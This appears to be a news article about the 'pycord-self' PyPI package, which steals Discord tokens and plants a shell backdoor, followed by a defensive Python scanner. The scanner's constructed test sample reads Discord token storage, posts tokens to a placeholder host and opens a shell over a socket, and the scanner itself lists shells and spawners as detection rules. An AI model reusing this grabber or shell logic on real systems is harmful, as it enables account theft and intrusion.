Ethical Hacking News
Malicious PyPI package steals Discord auth tokens from devs: according to a recent security report by code security company Socket, a malicious Python package has been found on the popular open-source package index PyPI. The package, named 'pycord-self', mimics the popular 'discord.py-self' project, a library developers use to communicate with Discord's user API and control accounts programmatically.
Summary: a malicious PyPI package named 'pycord-self' steals Discord auth tokens and plants a backdoor for remote control. The package mimics a popular legitimate project with nearly 28 million downloads and offers similar functionality, so it appears to work as expected. It was added to PyPI in June 2024 and has been downloaded 885 times so far. It steals Discord authentication tokens and sends them to an external URL, allowing attackers to hijack the developer's Discord account without the password. Separately, the package sets up a stealthy backdoor that keeps a persistent connection to a remote server on port 6969 and launches a shell ('bash' on Linux, 'cmd' on Windows), giving the attacker continuous access to the victim's system. Software developers are advised to check a package's authenticity before installing it and to review or scan its code for suspicious functions.
Malicious PyPi package steals Discord auth tokens from devs
A malicious package named 'pycord-self' on the Python package index (PyPI) targets Discord developers to steal authentication tokens and plant a backdoor for remote control over the system.
The package mimics the highly popular 'discord.py-self,' which has nearly 28 million downloads, and even offers the functionality of the legitimate project.
The official package is a Python library that allows communication with Discord's user API and permits developers to control accounts programmatically.
It is typically used for messaging and automating interactions, creating bots, scripting automated moderation, notifications or responses, and running commands or retrieving data from Discord without a bot account.
According to code security company Socket, the malicious package was added to PyPI in June 2024 and has been downloaded 885 times so far.
At the time of writing, the package is still available on PyPI from a publisher that had its details verified by the platform.
The malicious package on PyPI (Source: BleepingComputer)
Token theft and persistent access
Socket researchers analyzed the malicious package and found that pycord-self contains code with two main functions. The first is stealing the victim's Discord authentication token and sending it to an external URL.
Code to grab the Discord token (Source: Socket)
Attackers can use the stolen token to hijack the developer's Discord account without knowing the password, and two-factor authentication does not block this: the token is issued after the login and second factor have already been completed, so replaying it requires neither.
The second function of the malicious package is to set up a stealthy backdoor mechanism by creating a persistent connection to a remote server through port 6969.
"Depending on the operating system, it launches a shell ("bash" on Linux or "cmd" on Windows) that grants the attacker continuous access to the victim's system," explains Socket in the report.
"The backdoor runs in a separate thread, making it difficult to detect while the package continues to appear functional."
Setting up a backdoor on the machine (Source: Socket)
Software developers are advised to avoid installing packages without checking that the code comes from the official author, especially when the package claims to be a popular one. Verifying the exact package name before installing can also lower the risk of falling victim to typosquatting or look-alike names.
When working with open-source libraries, it is advisable to review the code for suspicious functions, if possible, and avoid anything that appears obfuscated. Additionally, scanning tools may help with detecting and blocking malicious packages.
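The kind of review the paragraph above recommends can be partly automated. The following is an added example, not Socket's tooling and not code from pycord-self: a small AST-based triage script that flags the tells described in this article, an outbound connect() to a hardcoded host:port, a process spawner handed a shell name, work pushed into a background thread, an HTTP client called with a hardcoded URL, and path assembly reaching into a Discord LevelDB store. The rule lists (shell names, HTTP client functions, the LevelDB tell) and the sample package source are assumptions constructed for this demonstration; the sample uses a TEST-NET address and a .invalid domain and leaves out the socket-to-stdio wiring, so it points nowhere and does nothing if run.

```python
"""Static triage of a Python package's source for the behaviours described in
the report: token exfiltration and a thread-based reverse shell.
Added example; not Socket's tooling, not code from pycord-self."""
import ast
from dataclasses import dataclass

# Rule lists are assumptions for this example, not taken from the report.
SHELL_NAMES = {"bash", "sh", "cmd", "cmd.exe", "powershell", "/bin/sh", "/bin/bash"}
PROCESS_SPAWNERS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
                    "subprocess.check_output", "os.system", "os.popen"}
HTTP_SENDERS = {"requests.post", "requests.get", "urllib.request.urlopen",
                "httpx.post", "httpx.get"}


@dataclass(frozen=True)
class Finding:
    line: int
    rule: str
    detail: str


def dotted_name(func: ast.AST) -> str:
    """Render a call target such as `subprocess.Popen` or `s.connect` as text."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""  # call on a call result, subscript, lambda, ...


def string_constants(node: ast.AST) -> list[str]:
    """Every string literal anywhere inside a node (args and keywords alike)."""
    return [n.value for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]


class TriageVisitor(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings: list[Finding] = []

    def visit_Call(self, node: ast.Call) -> None:
        name = dotted_name(node.func)
        literals = string_constants(node)
        # Reverse-shell tell 1: connect() to a literal (host, port) pair.
        if name.endswith(".connect") and node.args:
            target = node.args[0]
            if (isinstance(target, ast.Tuple) and len(target.elts) == 2
                    and all(isinstance(e, ast.Constant) for e in target.elts)):
                host, port = (e.value for e in target.elts)
                self.findings.append(Finding(node.lineno, "hardcoded-connect", f"{host}:{port}"))
        # Reverse-shell tell 2: a process spawner given a shell name.
        if name in PROCESS_SPAWNERS:
            for s in literals:
                if s.lower() in SHELL_NAMES:
                    self.findings.append(Finding(node.lineno, "shell-spawn", s))
        # Reverse-shell tell 3: work pushed into a background thread.
        if name == "threading.Thread":
            self.findings.append(Finding(node.lineno, "background-thread", "threading.Thread(...)"))
        # Exfiltration tell 1: HTTP client called with a hardcoded URL.
        if name in HTTP_SENDERS:
            for s in literals:
                if s.startswith(("http://", "https://")):
                    self.findings.append(Finding(node.lineno, "http-exfil", s))
        # Exfiltration tell 2: path assembly reaching into a Discord LevelDB store,
        # where desktop clients keep the token (assumption: common grabber pattern).
        if name == "os.path.join":
            joined = "/".join(literals).lower()
            if "leveldb" in joined:
                self.findings.append(Finding(node.lineno, "token-storage-path", joined))
        self.generic_visit(node)


def triage(source: str) -> list[Finding]:
    visitor = TriageVisitor()
    visitor.visit(ast.parse(source))
    return visitor.findings


def triage_rules(source: str) -> set[str]:
    return {f.rule for f in triage(source)}


# Constructed sample mirroring the report's description; it is only parsed, never run.
SAMPLE = r'''
import os, re, socket, subprocess, threading, requests

def _grab():
    store = os.path.join(os.getenv("APPDATA", ""), "discord", "Local Storage", "leveldb")
    for name in os.listdir(store):
        blob = open(os.path.join(store, name), errors="ignore").read()
        for tok in re.findall(r"[\w-]{24,}\.[\w-]{6}\.[\w-]{27,}", blob):
            requests.post("http://example.invalid/collect", json={"t": tok})

def _shell():
    s = socket.socket()
    s.connect(("203.0.113.10", 6969))
    subprocess.Popen(["cmd" if os.name == "nt" else "bash"])  # stdio wiring omitted

threading.Thread(target=_shell, daemon=True).start()
'''

# Constructed benign control: joins a path, but nothing in the rule set fires.
BENIGN = r'''
import os
def data_dir():
    return os.path.join(os.path.expanduser("~"), ".myapp", "cache")
'''

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"line {f.line:>3}  {f.rule:<18} {f.detail}")
```

Run it against an unpacked sdist or wheel (ast.parse each .py file) before installing; a hit on any single rule is only a hint, but a hardcoded connect plus a shell spawn plus a background thread in one module, as in the sample, is the shape of the backdoor the report describes and warrants a manual read.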
Related Information:
https://www.bleepingcomputer.com/news/security/malicious-pypi-package-steals-discord-auth-tokens-from-devs/
Published: Fri Jan 17 16:27:53 2025 by llama3.2 3B Q4_K_M